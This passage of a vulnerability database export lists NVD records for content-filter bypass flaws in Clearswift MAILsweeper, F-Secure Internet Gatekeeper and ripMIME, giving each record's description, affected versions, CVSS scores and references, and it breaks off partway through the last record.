Vulnerabilites related to clearswift - mailsweeper
Vulnerability from fkie_nvd
Published
2004-10-20 04:00
Modified
2024-11-20 23:47
Severity ?
Summary
Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME encapsulation that uses RFC822 comment fields, which may be interpreted as other fields by mail clients.



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "CA12B965-672C-444D-9774-0F76FE47EA29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6C9B32C-5EC9-46BD-AA77-F414A143576C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "823C27EB-C00F-4A7E-B832-013A50A1EE2D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "BD217379-28E7-465E-843D-E7204EE0E89F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "EB96CB8A-59F3-4624-B2BA-687ECF929B79",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.14:*:*:*:*:*:*:*",
              "matchCriteriaId": "04A02C12-547E-4086-A409-53AA68F1A4D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.15:*:*:*:*:*:*:*",
              "matchCriteriaId": "8185FBF2-D678-4D90-A5AC-F9B06DFED95F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:internet_gatekeeper:6.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "4F4EC2BB-A979-4C37-B8BB-086DAEEB4A6A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:internet_gatekeeper:6.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "CD53E1BC-6A92-4D7C-BE1F-FEF88F78DBD4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:internet_gatekeeper:6.31:*:*:*:*:*:*:*",
              "matchCriteriaId": "AC782BFC-6BA0-4823-8A6D-F7D83F55393C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:internet_gatekeeper:6.32:*:*:*:*:*:*:*",
              "matchCriteriaId": "E1B09025-47B9-4F77-9DA6-80885E9A4EC4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "7E021143-608B-44A2-84FB-8F8AC00A9985",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "0A9BB1C1-2CB2-426D-A8CE-AF5CB0B98674",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "7AC4686E-B92F-47ED-90DA-42AF650521D2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "80EF73F0-1FE1-4041-9C07-A89D153DA41F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "EF45C4F8-A20C-4D7D-B203-AF36FB046C63",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "75222D1B-1384-4C74-A54F-BC028C5CDB69",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "A5129FD4-C011-4EA9-B8A1-256E95494FE6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F33D78C-9CD1-49A6-A43E-D0187600C033",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.3.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6D3CF1D-64E1-47DB-8767-EF8DBF4E17AE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.3.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "9E725208-BA0C-41D9-BC45-84577A94AAA1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.3.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "A43C3DCC-3298-4D4D-9485-4A3BECB615E9",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME encapsulation that uses RFC822 comment fields, which may be interpreted as other fields by mail clients."
    },
    {
      "lang": "es",
      "value": "M\u00faltiples productos de pasarelas de seguridad de contenidos y antivirus pueden permitir a atacantes remotos saltarse restricciones de contenido mediante encapsulaci\u00f3n MIME que usa campos de comentarios RFC822, lo que puede ser interpretado como otros campos por clientes de correo."
    }
  ],
  "id": "CVE-2004-0162",
  "lastModified": "2024-11-20T23:47:54.050",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": true,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2004-10-20T04:00:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://marc.info/?l=bugtraq\u0026m=109517563513776\u0026w=2"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17332"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://marc.info/?l=bugtraq\u0026m=109517563513776\u0026w=2"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17332"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2004-10-20 04:00
Modified
2024-11-20 23:46
Severity ?
Summary
Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME messages that use whitespace in an unusual fashion, which may be interpreted differently by mail clients.



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "CA12B965-672C-444D-9774-0F76FE47EA29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6C9B32C-5EC9-46BD-AA77-F414A143576C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "823C27EB-C00F-4A7E-B832-013A50A1EE2D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "BD217379-28E7-465E-843D-E7204EE0E89F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "EB96CB8A-59F3-4624-B2BA-687ECF929B79",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.14:*:*:*:*:*:*:*",
              "matchCriteriaId": "04A02C12-547E-4086-A409-53AA68F1A4D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.15:*:*:*:*:*:*:*",
              "matchCriteriaId": "8185FBF2-D678-4D90-A5AC-F9B06DFED95F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:internet_gatekeeper:6.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "4F4EC2BB-A979-4C37-B8BB-086DAEEB4A6A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:internet_gatekeeper:6.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "CD53E1BC-6A92-4D7C-BE1F-FEF88F78DBD4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:internet_gatekeeper:6.31:*:*:*:*:*:*:*",
              "matchCriteriaId": "AC782BFC-6BA0-4823-8A6D-F7D83F55393C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:internet_gatekeeper:6.32:*:*:*:*:*:*:*",
              "matchCriteriaId": "E1B09025-47B9-4F77-9DA6-80885E9A4EC4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "7E021143-608B-44A2-84FB-8F8AC00A9985",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "0A9BB1C1-2CB2-426D-A8CE-AF5CB0B98674",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "7AC4686E-B92F-47ED-90DA-42AF650521D2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "80EF73F0-1FE1-4041-9C07-A89D153DA41F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "EF45C4F8-A20C-4D7D-B203-AF36FB046C63",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "75222D1B-1384-4C74-A54F-BC028C5CDB69",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "A5129FD4-C011-4EA9-B8A1-256E95494FE6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F33D78C-9CD1-49A6-A43E-D0187600C033",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.3.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6D3CF1D-64E1-47DB-8767-EF8DBF4E17AE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.3.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "9E725208-BA0C-41D9-BC45-84577A94AAA1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.3.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "A43C3DCC-3298-4D4D-9485-4A3BECB615E9",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME messages that use whitespace in an unusual fashion, which may be interpreted differently by mail clients."
    },
    {
      "lang": "es",
      "value": "M\u00faltiples productos de pasarelas de seguridad de contenidos y antivirus pueden permitir a atacantes remotos saltarse restricciones de contenido mediante mensajes MIME que usan espacios en blanco de manera inusual, lo que puede ser interpretado diferentemente por clientes de correo."
    }
  ],
  "id": "CVE-2003-1015",
  "lastModified": "2024-11-20T23:46:09.377",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": true,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2004-10-20T04:00:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://marc.info/?l=bugtraq\u0026m=109525252118936\u0026w=2"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/9273"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://marc.info/?l=bugtraq\u0026m=109525252118936\u0026w=2"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/9273"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2004-10-20 04:00
Modified
2024-11-20 23:47
Severity ?
Summary
Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME messages that use fields that use RFC2047 encoding, which may be interpreted differently by mail clients.



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "CA12B965-672C-444D-9774-0F76FE47EA29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6C9B32C-5EC9-46BD-AA77-F414A143576C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "823C27EB-C00F-4A7E-B832-013A50A1EE2D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "BD217379-28E7-465E-843D-E7204EE0E89F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "EB96CB8A-59F3-4624-B2BA-687ECF929B79",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.14:*:*:*:*:*:*:*",
              "matchCriteriaId": "04A02C12-547E-4086-A409-53AA68F1A4D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.15:*:*:*:*:*:*:*",
              "matchCriteriaId": "8185FBF2-D678-4D90-A5AC-F9B06DFED95F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:internet_gatekeeper:6.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "4F4EC2BB-A979-4C37-B8BB-086DAEEB4A6A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:internet_gatekeeper:6.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "CD53E1BC-6A92-4D7C-BE1F-FEF88F78DBD4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:internet_gatekeeper:6.31:*:*:*:*:*:*:*",
              "matchCriteriaId": "AC782BFC-6BA0-4823-8A6D-F7D83F55393C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:internet_gatekeeper:6.32:*:*:*:*:*:*:*",
              "matchCriteriaId": "E1B09025-47B9-4F77-9DA6-80885E9A4EC4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "7E021143-608B-44A2-84FB-8F8AC00A9985",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "0A9BB1C1-2CB2-426D-A8CE-AF5CB0B98674",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "7AC4686E-B92F-47ED-90DA-42AF650521D2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "80EF73F0-1FE1-4041-9C07-A89D153DA41F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "EF45C4F8-A20C-4D7D-B203-AF36FB046C63",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "75222D1B-1384-4C74-A54F-BC028C5CDB69",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "A5129FD4-C011-4EA9-B8A1-256E95494FE6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F33D78C-9CD1-49A6-A43E-D0187600C033",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.3.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6D3CF1D-64E1-47DB-8767-EF8DBF4E17AE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.3.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "9E725208-BA0C-41D9-BC45-84577A94AAA1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.3.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "A43C3DCC-3298-4D4D-9485-4A3BECB615E9",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME messages that use fields that use RFC2047 encoding, which may be interpreted differently by mail clients."
    },
    {
      "lang": "es",
      "value": "M\u00faltiples productos de pasarelas de seguridad de contenidos y antivirus pueden permitir a atacantes remotos saltarse restricciones de contenido mediante mensajes MIME que usan campos con codificaci\u00f3n RFC2047, lo que puede ser interpretado de manera diferente por clientes de correo."
    }
  ],
  "id": "CVE-2004-0053",
  "lastModified": "2024-11-20T23:47:39.170",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": true,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2004-10-20T04:00:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://marc.info/?l=bugtraq\u0026m=109520704408739\u0026w=2"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17331"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://marc.info/?l=bugtraq\u0026m=109520704408739\u0026w=2"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17331"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2004-09-28 04:00
Modified
2024-11-20 23:45
Severity ?
Summary
Clearswift MAILsweeper before 4.3.15 does not properly detect filenames in BinHex (HQX) encoded files, which allows remote attackers to bypass intended policy.
Impacted products
Vendor Product Version
clearswift mailsweeper *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "09D10925-2F78-40C9-9B32-08C689D6412D",
              "versionEndIncluding": "4.3.15",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Clearswift MAILsweeper before 4.3.15 does not properly detect filenames in BinHex (HQX) encoded files, which allows remote attackers to bypass intended policy."
    },
    {
      "lang": "es",
      "value": "Clearswift MAILsweeper anteriores a 4.3.15 no detecta nombres de fichero en ficheros codificados BinHex (HQX), lo que permite a atacantes remotos sortear la pol\u00edtica pretendida."
    }
  ],
  "id": "CVE-2003-0930",
  "lastModified": "2024-11-20T23:45:48.560",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": true,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2004-09-28T04:00:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://marc.info/?l=bugtraq\u0026m=109241692108678\u0026w=2"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://www.corsaire.com/advisories/c030807-001.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://marc.info/?l=bugtraq\u0026m=109241692108678\u0026w=2"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://www.corsaire.com/advisories/c030807-001.txt"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2004-10-20 04:00
Modified
2024-11-20 23:47
Severity ?
Summary
Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME messages that use non-standard but frequently supported Content-Transfer-Encoding values such as (1) uuencode, (2) mac-binhex40, and (3) yenc, which may be interpreted differently by mail clients.



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "CA12B965-672C-444D-9774-0F76FE47EA29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6C9B32C-5EC9-46BD-AA77-F414A143576C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "823C27EB-C00F-4A7E-B832-013A50A1EE2D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "BD217379-28E7-465E-843D-E7204EE0E89F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "EB96CB8A-59F3-4624-B2BA-687ECF929B79",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.14:*:*:*:*:*:*:*",
              "matchCriteriaId": "04A02C12-547E-4086-A409-53AA68F1A4D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.15:*:*:*:*:*:*:*",
              "matchCriteriaId": "8185FBF2-D678-4D90-A5AC-F9B06DFED95F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:internet_gatekeeper:6.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "4F4EC2BB-A979-4C37-B8BB-086DAEEB4A6A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:internet_gatekeeper:6.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "CD53E1BC-6A92-4D7C-BE1F-FEF88F78DBD4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:internet_gatekeeper:6.31:*:*:*:*:*:*:*",
              "matchCriteriaId": "AC782BFC-6BA0-4823-8A6D-F7D83F55393C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:internet_gatekeeper:6.32:*:*:*:*:*:*:*",
              "matchCriteriaId": "E1B09025-47B9-4F77-9DA6-80885E9A4EC4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "7E021143-608B-44A2-84FB-8F8AC00A9985",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "0A9BB1C1-2CB2-426D-A8CE-AF5CB0B98674",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "7AC4686E-B92F-47ED-90DA-42AF650521D2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "80EF73F0-1FE1-4041-9C07-A89D153DA41F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "EF45C4F8-A20C-4D7D-B203-AF36FB046C63",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "75222D1B-1384-4C74-A54F-BC028C5CDB69",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.6:*:*:*:*:*:*:*",
